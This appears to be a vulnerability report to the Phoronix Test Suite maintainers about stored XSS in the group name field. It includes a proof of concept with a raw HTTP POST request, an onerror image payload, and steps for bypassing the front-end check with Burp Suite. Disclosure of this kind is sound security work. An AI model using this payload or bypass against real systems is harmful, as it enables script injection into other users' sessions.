Description

Hi there phoronix test suite maintainer team.
There is a stored XSS in phoronix-test-suite source code. This is in group name.

Proof of Concept

1. Install a local instance of phoronix test suite
2. Create an account and log in, then create a group with name <img src>. Note that you cannot create this on the UI because JavaScript to forbid this is implemented. To do that, you need a tool like Burp Suite to bypass frontend check and create system group directly. A request for creating group with specials would look like this:

POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer:{phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1

new_group=1235<img+src=a+onerror=alert(1)>

3. After creating the system group, go back to /?systems and see that an alert pops up.

Impact

This vulnerability is capable of stored XSS.